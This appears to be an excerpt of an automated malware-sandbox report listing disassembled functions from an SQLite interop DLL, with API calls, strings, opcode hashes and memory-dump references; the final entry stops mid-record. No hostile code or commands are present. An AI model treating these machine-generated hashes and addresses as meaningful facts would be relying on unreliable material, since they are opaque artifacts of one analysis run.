                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I9c6d7cd7b7d38055.
                                                                                      • String ID: cannot open value of type %s$integer$no such rowid: %lld$null$real
                                                                                      • API String ID: 1680335069-2278770044
                                                                                      • Opcode ID: 1164873e3275e33acdf6e0679d570f054cd133027c0ad9430d09998c0de230a9
                                                                                      • Instruction ID: a116615868350d902e915480d6b4f42325ab4af0d238bbbbe330f03203cd26a2
                                                                                      • Opcode Fuzzy Hash: 1164873e3275e33acdf6e0679d570f054cd133027c0ad9430d09998c0de230a9
                                                                                      • Instruction Fuzzy Hash: 2241CDB56002048BD724DF68E890FA6B7F1FF98319F1445ADE90A8BB51E732EC15CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3FE250 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 121COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015025,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C3FE2DC
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(6C3FAC4B,00000003,?), ref: 6C3FE36C
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(6C3FAC4B,6C3FAC4B,00000003,?), ref: 6C3FE374
                                                                                        • Part of subcall function 6C4B4840: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,?,?,6C4B45F9,?,?,?,?,?,6C40EDB8,?,?,?,?), ref: 6C4B4852
                                                                                        • Part of subcall function 6C4B4840: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014FD9,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4B49A9
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C3FE2D5
                                                                                      • misuse, xrefs: 6C3FE2D0
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C3FE2C6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.$I46481015c7f49c68.I9c6d7cd7b7d38055.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 3511625435-1203237178
                                                                                      • Opcode ID: 8bd809b328c5a45aa782e28af2bd9868cbca03c4874b7495bab075969706863b
                                                                                      • Instruction ID: 8aff953e22834c021f4fbc8da564e212c8a072c7cee9cedc8a06278b708edcbc
                                                                                      • Opcode Fuzzy Hash: 8bd809b328c5a45aa782e28af2bd9868cbca03c4874b7495bab075969706863b
                                                                                      • Instruction Fuzzy Hash: FF4180B06043019FD714DF18C845E57B7E5AF84318F14482DE9658BB51EB71E8068BD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F4CB0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,?,?), ref: 6C3F4CF9
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015025,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C3F4D20
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?), ref: 6C3F4D84
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C3F4D19
                                                                                      • misuse, xrefs: 6C3F4D14
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C3F4D0A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I46481015c7f49c68.I950480ab972e108d.I9c6d7cd7b7d38055.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 714229523-1203237178
                                                                                      • Opcode ID: f010e944b7cbee99d1b8caf9e42c2b279c1b3e942bcaa8b4e509fbacc8c5c092
                                                                                      • Instruction ID: c6c1614be993b5f17f2258453481feaf1d69c9134ae8b35733fa2909af7ac3ab
                                                                                      • Opcode Fuzzy Hash: f010e944b7cbee99d1b8caf9e42c2b279c1b3e942bcaa8b4e509fbacc8c5c092
                                                                                      • Instruction Fuzzy Hash: DD31D6717001005BE701DE199D44FAB739AEF84269F18492CF928D7B42EB37D9168BF2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C418350 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C418470: SI46481015c7f49c68.SQLITE.INTEROP(?,?,00000001,00000000,00000000,00000000,00000000), ref: 6C4184FE
                                                                                        • Part of subcall function 6C418470: SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,00000000,00000000,00000000), ref: 6C418511
                                                                                        • Part of subcall function 6C418470: SIf216ef3874529d42.SQLITE.INTEROP(00000000,?,?,00000000,00000000,00000000), ref: 6C41852C
                                                                                      • SIdba35b6dcb77d463.SQLITE.INTEROP(?,SAVEPOINT replace_op,00000000,00000000,00000000), ref: 6C4183D4
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,?,00000001,00000000), ref: 6C418408
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?), ref: 6C41841B
                                                                                      • SIdba35b6dcb77d463.SQLITE.INTEROP(?,RELEASE replace_op,00000000,00000000,00000000), ref: 6C418455
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I46481015c7f49c68.I9c6d7cd7b7d38055.Idba35b6dcb77d463.$If216ef3874529d42.
                                                                                      • String ID: RELEASE replace_op$SAVEPOINT replace_op
                                                                                      • API String ID: 3646552315-3590263232
                                                                                      • Opcode ID: 80a132cf09de5e850481e03ade460c23533f82b08d7ce6325a1f07e4a0ca48ad
                                                                                      • Instruction ID: be434e5aa4d3b14e99c4731e846e9d5b004452243428bd7d1befd5eb476122ae
                                                                                      • Opcode Fuzzy Hash: 80a132cf09de5e850481e03ade460c23533f82b08d7ce6325a1f07e4a0ca48ad
                                                                                      • Instruction Fuzzy Hash: 2631D3B16082006BE710DA06DC41F7BB7EDEF8465DF04492AFD98D2B51FB31D91986E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C434650 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C436930: SI1c7a7970970b9619.SQLITE.INTEROP(INSERT INTO %Q.'%q_content' VALUES(%s),00000000,?,6C4FF2F8,?,?,00000000), ref: 6C436ACA
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,00000000,?,00000000,?,?,?,?,?,6C4321F1), ref: 6C434685
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015025,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,00000000,?,?,?,?,?,6C4321F1), ref: 6C4346AA
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,?,?,?,00000000,?,?,?,?,?,6C4321F1), ref: 6C43470E
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4346A3
                                                                                      • misuse, xrefs: 6C43469E
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C434694
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.I46481015c7f49c68.I950480ab972e108d.I9c6d7cd7b7d38055.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 198471999-1203237178
                                                                                      • Opcode ID: 1026ca30fc47c54d9d1fa418ae32fb7fb5aea903c1f64cc8731392bd19ed2f97
                                                                                      • Instruction ID: fd00db58368b040a6673ee4bc1e585fd76d5477b24ef104f5b2c2d464b824ea3
                                                                                      • Opcode Fuzzy Hash: 1026ca30fc47c54d9d1fa418ae32fb7fb5aea903c1f64cc8731392bd19ed2f97
                                                                                      • Instruction Fuzzy Hash: 2A2149B5B0020027E600DE198C88EEB769ADFC925DF24142CF919D7B41FB36D80686E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F8860 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(6C3F6730,?,0g?l,?,?,00000000,?,?,?,6C3F6730,?), ref: 6C3F8873
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B57CC
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014D90,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B580C
                                                                                      • SIf8364af380546f2d.SQLITE.INTEROP(6C3F6730,00000000,?,?,00000000,?,?,?,6C3F6730), ref: 6C3F88A1
                                                                                      • SId99ac2a61d035e11.SQLITE.INTEROP(6C3F6730,00000001,6C3F6730,00000000,?,?,00000000,?,?,?,6C3F6730), ref: 6C3F88B0
                                                                                      • SIbc9b0b73a965892b.SQLITE.INTEROP(6C3F6730,00000001,6C3F6730,00000001,6C3F6730,00000000,?,?,00000000,?,?,?,6C3F6730), ref: 6C3F88BC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.$I9c6d7cd7b7d38055.Ibc9b0b73a965892b.Id99ac2a61d035e11.If8364af380546f2d.
                                                                                      • String ID: 0g?l$0g?l
                                                                                      • API String ID: 3612544599-2787364043
                                                                                      • Opcode ID: a94ddc7f4b815a36c86bf6afe56dbb589c99302e38a540835ab3ee1f8a2fb5ac
                                                                                      • Instruction ID: ef7728c9bef7eadea635151d4f7dc9fb91bdb993e797ee6f0cd8e4703a7dba0c
                                                                                      • Opcode Fuzzy Hash: a94ddc7f4b815a36c86bf6afe56dbb589c99302e38a540835ab3ee1f8a2fb5ac
                                                                                      • Instruction Fuzzy Hash: 15216B74E002089FDB18DFAAD881A9EFBF1EF48314F50896ED549A7700D772AA458F91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4944D0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(%s.%s,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C494530
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(%s.%z,?,00000000), ref: 6C49454D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.
                                                                                      • String ID: %s.%s$%s.%z$access to %z is prohibited$authorizer malfunction
                                                                                      • API String ID: 962285590-3806136567
                                                                                      • Opcode ID: 8768f1200b32b90002921ab3978999b58c2f70f4d12b910fb9b2c082b9d53917
                                                                                      • Instruction ID: d5343190c38f3686996542fd20b82419af8e1ee334fc3eb55510efa449cf1965
                                                                                      • Opcode Fuzzy Hash: 8768f1200b32b90002921ab3978999b58c2f70f4d12b910fb9b2c082b9d53917
                                                                                      • Instruction Fuzzy Hash: 2521A476A001147BDB10DE98EC40FE9BB78EB85379F004169FE2C9A701E33299659BE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3E004C Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C3E0010: _free.LIBCMT ref: 6C3E0039
                                                                                      • _free.LIBCMT ref: 6C3E009A
                                                                                        • Part of subcall function 6C3D7AF4: HeapFree.KERNEL32(00000000,00000000,?,6C3D7761,00000001,00000001), ref: 6C3D7B0A
                                                                                        • Part of subcall function 6C3D7AF4: GetLastError.KERNEL32(78A8D6F6,?,6C3D7761,00000001,00000001), ref: 6C3D7B1C
                                                                                      • _free.LIBCMT ref: 6C3E00A5
                                                                                      • _free.LIBCMT ref: 6C3E00B0
                                                                                      • _free.LIBCMT ref: 6C3E0104
                                                                                      • _free.LIBCMT ref: 6C3E010F
                                                                                      • _free.LIBCMT ref: 6C3E011A
                                                                                      • _free.LIBCMT ref: 6C3E0125
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 776569668-0
                                                                                      • Opcode ID: cee2bde9cb363292b54595cbfc1384599595b94563229988348e35b5efc2aa2e
                                                                                      • Instruction ID: 40857908ef5c9b48f4637aacda8bd1dd8eaba3dd9b6f505b6fb7cbe17cce3ffd
                                                                                      • Opcode Fuzzy Hash: cee2bde9cb363292b54595cbfc1384599595b94563229988348e35b5efc2aa2e
                                                                                      • Instruction Fuzzy Hash: 9C115172540B58AAD620E7B0CC05FCBB79C9F09708F400C56B2E9A6B50DFB5BA096F52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3D2AA0 Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000001,?,6C3D2734,6C3D17AE,6C3D13F7,?,6C3D1607,?,00000001,?,?,00000001,?,6C50DDB0,0000000C,6C3D16F0), ref: 6C3D2AAE
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6C3D2ABC
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6C3D2AD5
                                                                                      • SetLastError.KERNEL32(00000000,6C3D1607,?,00000001,?,?,00000001,?,6C50DDB0,0000000C,6C3D16F0,?,00000001,?), ref: 6C3D2B27
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: e30effaa3a1d2a8185a21d55c7c863db0f00b47bda14995281189e6d1a650d21
                                                                                      • Instruction ID: 4329ef01f68379b31ff2057260aa3f1488a5ed8d9c7e51aff11096e512606d9f
                                                                                      • Opcode Fuzzy Hash: e30effaa3a1d2a8185a21d55c7c863db0f00b47bda14995281189e6d1a650d21
                                                                                      • Instruction Fuzzy Hash: 9B016833B087125EAA151E755D4CA4726B4EB072BC32303AAF13045DD0EF53BC059940
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4248D0 Relevance: 9.3, APIs: 6, Instructions: 286COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,?,?,?,?,?,00000000), ref: 6C42491A
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000001,?,?,?,?,?,00000000), ref: 6C424922
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,API called with NULL prepared statement,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B57CC
                                                                                        • Part of subcall function 6C4B57B0: SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00014D90,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,00000000,00000000,?,6C47D2D6,?,?,?,00000000,00000000,?), ref: 6C4B580C
                                                                                      • SIf8364af380546f2d.SQLITE.INTEROP(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 6C424933
                                                                                      • SI46481015c7f49c68.SQLITE.INTEROP(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4249E0
                                                                                      • SI9c6d7cd7b7d38055.SQLITE.INTEROP(?,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4249E8
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(?,?,?,?,00000000), ref: 6C424C1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I46481015c7f49c68.I950480ab972e108d.I9c6d7cd7b7d38055.$If8364af380546f2d.Ifc350ae509dc2b53.
                                                                                      • String ID:
                                                                                      • API String ID: 1145289639-0
                                                                                      • Opcode ID: 5fc255cbe6ac3fcdf58335a672110bd6fbf38f115d2cc022319f780623b0a017
                                                                                      • Instruction ID: 1fdf2eb5350b13c98f15f427f84b05d88fb5827e812b1616406e37b484b1ab14
                                                                                      • Opcode Fuzzy Hash: 5fc255cbe6ac3fcdf58335a672110bd6fbf38f115d2cc022319f780623b0a017
                                                                                      • Instruction Fuzzy Hash: 56A1D2707047028BD704CF16C882E5AB7F6FF84359F144A2CE86587B40EB79E959CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4169B0 Relevance: 9.1, APIs: 6, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI9196a02c851acbfb.SQLITE.INTEROP(?,00000000,000000FF,000000FF), ref: 6C4169E7
                                                                                      • SIcd6b4ac0aeff7202.SQLITE.INTEROP(?,?), ref: 6C416A0B
                                                                                      • SIcd6b4ac0aeff7202.SQLITE.INTEROP(?,?), ref: 6C416A49
                                                                                      • SIcd6b4ac0aeff7202.SQLITE.INTEROP(?,00000001), ref: 6C416A92
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: Icd6b4ac0aeff7202.$I9196a02c851acbfb.
                                                                                      • String ID:
                                                                                      • API String ID: 2731026633-0
                                                                                      • Opcode ID: 30333dce9f95350b9380d93e553b4ef45dac023347df1cd2c61f6841a7499116
                                                                                      • Instruction ID: 45f09bb5c31cdbd97be9f8322bb37b18fcea5c6935e14310d46c6e9a935752a6
                                                                                      • Opcode Fuzzy Hash: 30333dce9f95350b9380d93e553b4ef45dac023347df1cd2c61f6841a7499116
                                                                                      • Instruction Fuzzy Hash: 51314F726190189FDB00DF28EC41EF573E8DB05229F1882A9FC1CD7B61E732DD648691
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4CE720 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 375COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI6e539204336d5b4b.SQLITE.INTEROP(00008000,00000000), ref: 6C4CE885
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4CE8BA
                                                                                      Strings
                                                                                      • recovered %d frames from WAL file %s, xrefs: 6C4CEAFB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I6e539204336d5b4b.Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID: recovered %d frames from WAL file %s
                                                                                      • API String ID: 144261810-1429783703
                                                                                      • Opcode ID: 3f43021e70b6ba83445dd81ee204c467bbc8cb3e7d720ce1ad0979df6e7da4ff
                                                                                      • Instruction ID: c9d32811011e54c33b75820baa5ddf21f8f66ef55c3e1577e54d90ac422a6074
                                                                                      • Opcode Fuzzy Hash: 3f43021e70b6ba83445dd81ee204c467bbc8cb3e7d720ce1ad0979df6e7da4ff
                                                                                      • Instruction Fuzzy Hash: 48D16C75A002089FDB14CFA8C8C1F9EB7F5BF89308F144529E819EBB91E731A945CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C3F8DF0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(recursively defined fts5 content table), ref: 6C3F8E3B
                                                                                      • ___swprintf_l.LIBCMT ref: 6C3F8F24
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
